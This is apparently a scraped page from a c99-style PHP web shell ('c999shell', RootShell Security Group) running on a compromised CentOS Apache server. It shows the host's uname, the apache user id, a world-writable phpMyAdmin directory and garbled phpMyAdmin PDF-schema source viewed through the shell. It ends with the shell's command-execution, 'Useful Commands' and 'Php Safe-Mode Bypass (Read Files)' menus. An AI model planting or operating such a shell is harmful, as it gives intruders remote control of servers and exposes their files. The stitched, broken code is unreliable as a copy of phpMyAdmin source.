Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/ drwxrwxrwx | |
| Viewing file: Select action/file-type: ' . "\n" . '' . $strDocu . '' . "\n"; require_once('./libraries/footer.inc.php'); } if (!$cfgRelation['displaywork']) { echo sprintf($strNotSet, 'table_info', 'config.inc.php') . ' ' . "\n" . '' . $strDocu . '' . "\n"; require_once('./libraries/footer.inc.php'); } if (!isset($cfgRelation['table_coords'])){ echo sprintf($strNotSet, 'table_coords', 'config.inc.php') . ' ' . "\n" . '' . $strDocu . '' . "\n"; exit(); } if (!isset($cfgRelation['pdf_pages'])) { echo sprintf($strNotSet, 'pdf_page', 'config.inc.php') . ' ' . "\n" . '' . $strDocu . '' . "\n"; exit(); } if ($cfgRelation['pdfwork']) { // Now is the time to work on all changes if (isset($do)) { switch ($do) { case 'choosepage': if ($action_choose=="1") { $ch_query = 'DELETE FROM ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_coords']) . ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\'' . ' AND pdf_page_number = ' . $chpage; PMA_query_as_cu($ch_query, FALSE, $query_default_option); $ch_query = 'DELETE FROM ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['pdf_pages']) . ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\'' . ' AND page_nr = ' . $chpage; PMA_query_as_cu($ch_query, FALSE, $query_default_option); unset($chpage); } break; case 'createpage': if (!isset($newpage) || $newpage == '') { $newpage = $strNoDescription; } $ins_query = 'INSERT INTO ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['pdf_pages']) . ' (db_name, page_descr)' . ' VALUES (\'' . PMA_sqlAddslashes($db) . '\', \'' . PMA_sqlAddslashes($newpage) . '\')'; PMA_query_as_cu($ins_query, FALSE, $query_default_option); // A u t o m a t i c l a y o u t // // TODO: support InnoDB if (isset($autolayout)) { // save the page number $pdf_page_number = PMA_DBI_insert_id((isset($controllink)?$controllink:'')); // get the tables that have relations, by descending // number of links $master_tables = 'SELECT COUNT(master_table), master_table' . ' FROM ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['relation']) . ' WHERE master_db = \'' . $db . '\'' . ' GROUP BY master_table' . ' ORDER BY ' . PMA_backquote('COUNT(master_table)') . ' DESC '; $master_tables_rs = PMA_query_as_cu($master_tables, FALSE, $query_default_option); if ($master_tables_rs && PMA_DBI_num_rows($master_tables_rs) > 0) { // first put all the master tables at beginning // of the list, so they are near the center of // the schema while (list(, $master_table) = PMA_DBI_fetch_row($master_tables_rs)) { $all_tables[] = $master_table; } // then for each master, add its foreigns into an array // of foreign tables, if not already there // (a foreign might be foreign for more than // one table, and might be a master itself) $foreign_tables = array(); foreach ($all_tables AS $master_table) { $foreigners = PMA_getForeigners($db, $master_table); foreach ($foreigners AS $foreigner) { if (!in_array($foreigner['foreign_table'], $foreign_tables)) { $foreign_tables[] = $foreigner['foreign_table']; } } } // then merge the arrays foreach ($foreign_tables AS $foreign_table) { if (!in_array($foreign_table, $all_tables)) { $all_tables[] = $foreign_table; } } // now generate the coordinates for the schema, // in a clockwise spiral $pos_x = 300; $pos_y = 300; $delta = 110; $delta_mult = 1.10; $direction = "right"; foreach ($all_tables AS $current_table) { // save current table's coordinates $insert_query = 'INSERT INTO ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_coords']) . ' ' . '(db_name, table_name, pdf_page_number, x, y) ' . 'VALUES (\'' . PMA_sqlAddslashes($db) . '\', \'' . PMA_sqlAddslashes($current_table) . '\',' . $pdf_page_number . ',' . $pos_x . ',' . $pos_y . ')'; PMA_query_as_cu($insert_query, FALSE, $query_default_option); // compute for the next table switch ($direction) { case 'right': $pos_x += $delta; $direction = "down"; $delta *= $delta_mult; break; case 'down': $pos_y += $delta; $direction = "left"; $delta *= $delta_mult; break; case 'left': $pos_x -= $delta; $direction = "up"; $delta *= $delta_mult; break; case 'up': $pos_y -= $delta; $direction = "right"; $delta *= $delta_mult; break; } // end switch } // end while } // end if there are master tables $chpage = $pdf_page_number; } // end if isset autolayout break; case 'edcoord': for ($i = 0; $i < $c_table_rows; $i++) { $arrvalue = 'c_table_' . $i; $arrvalue = $$arrvalue; if (!isset($arrvalue['x']) || $arrvalue['x'] == '') { $arrvalue['x'] = 0; } if (!isset($arrvalue['y']) || $arrvalue['y'] == '') { $arrvalue['y'] = 0; } if (isset($arrvalue['name']) && $arrvalue['name'] != '--') { $test_query = 'SELECT * FROM ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_coords']) . ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\'' . ' AND table_name = \'' . PMA_sqlAddslashes($arrvalue['name']) . '\'' . ' AND pdf_page_number = ' . $chpage; $test_rs = PMA_query_as_cu($test_query, FALSE, $query_default_option); if ($test_rs && PMA_DBI_num_rows($test_rs) > 0) { if (isset($arrvalue['delete']) && $arrvalue['delete'] == 'y') { $ch_query = 'DELETE FROM ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_coords']) . ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\'' . ' AND table_name = \'' . PMA_sqlAddslashes($arrvalue['name']) . '\'' . ' AND pdf_page_number = ' . $chpage; } else { $ch_query = 'UPDATE ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_coords']) . ' ' . 'SET x = ' . $arrvalue['x'] . ', y= ' . $arrvalue['y'] . ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\'' . ' AND table_name = \'' . PMA_sqlAddslashes($arrvalue['name']) . '\'' . ' AND pdf_page_number = ' . $chpage; } } else { $ch_query = 'INSERT INTO ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_coords']) . ' ' . '(db_name, table_name, pdf_page_number, x, y) ' . 'VALUES (\'' . PMA_sqlAddslashes($db) . '\', \'' . PMA_sqlAddslashes($arrvalue['name']) . '\',' . $chpage . ',' . $arrvalue['x'] . ',' . $arrvalue['y'] . ')'; } PMA_query_as_cu($ch_query, FALSE, $query_default_option); } // end if } // end for break; case 'deleteCrap': foreach ($delrow AS $current_row) { $d_query = 'DELETE FROM ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_coords']) . ' ' . "\n" . ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\'' . "\n" . ' AND table_name = \'' . PMA_sqlAddslashes($current_row) . '\'' . "\n" . ' AND pdf_page_number = ' . $chpage; PMA_query_as_cu($d_query, FALSE, $query_default_option); } break; } // end switch } // end if (isset($do)) // We will need an array of all tables in this db $selectboxall = array('--'); $alltab_rs = PMA_DBI_query('SHOW TABLES FROM ' . PMA_backquote($db) . ';', null, PMA_DBI_QUERY_STORE); while ($val = @PMA_DBI_fetch_row($alltab_rs)) { $selectboxall[] = $val[0]; } // Now first show some possibility to choose a page for the pdf $page_query = 'SELECT * FROM ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['pdf_pages']) . ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\''; $page_rs = PMA_query_as_cu($page_query, FALSE, $query_default_option); if ($page_rs && PMA_DBI_num_rows($page_rs) > 0) { ?> 0) { echo "\n"; ?>
$temp_sh_page) {
$drag_x = $temp_sh_page['x'];
$drag_y = $temp_sh_page['y'];
$draginit .= ' Drag.init(getElement("table_' . $i . '"), null, 0, parseInt(myid.style.width)-2, 0, parseInt(myid.style.height)-5);' . "\n";
$draginit .= ' getElement("table_' . $i . '").onDrag = function (x, y) { document.edcoord.elements["c_table_' . $i . '[x]"].value = parseInt(x); document.edcoord.elements["c_table_' . $i . '[y]"].value = parseInt(y) }' . "\n";
$draginit .= ' getElement("table_' . $i . '").style.left = "' . $drag_x . 'px";' . "\n";
$draginit .= ' getElement("table_' . $i . '").style.top = "' . $drag_y . 'px";' . "\n";
$reset_draginit .= ' getElement("table_' . $i . '").style.left = "2px";' . "\n";
$reset_draginit .= ' getElement("table_' . $i . '").style.top = "' . (15 * $i) . 'px";' . "\n";
$reset_draginit .= ' document.edcoord.elements["c_table_' . $i . '[x]"].value = "2"' . "\n";
$reset_draginit .= ' document.edcoord.elements["c_table_' . $i . '[y]"].value = "' . (15 * $i) . '"' . "\n";
$local_query = 'SHOW FIELDS FROM '
. PMA_backquote($temp_sh_page['table_name'] )
. ' FROM ' . PMA_backquote($db);
$fields_rs = PMA_DBI_query($local_query);
unset($local_query);
$fields_cnt = PMA_DBI_num_rows($fields_rs);
echo '
' . "\n\n";
} // end if
// Check if there are tables that need to be deleted,
// if there are, ask the user for allowance
$_strtrans = '';
$_strname = '';
$shoot = FALSE;
if (!empty($tabExist) && is_array($tabExist)) {
foreach ($tabExist AS $key => $value) {
if (!$value) {
$_strtrans .= '' . "\n";
$_strname .= '' . $temp_sh_page['table_name'] . '';
if (isset($with_field_names)) {
while ($row = PMA_DBI_fetch_assoc($fields_rs)) {
echo ' ' . "\n";
PMA_DBI_free_result($fields_rs);
unset($fields_rs);
$i++;
}
?>
' . htmlspecialchars($row['Field']) . "\n"; } } echo ' |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]-- |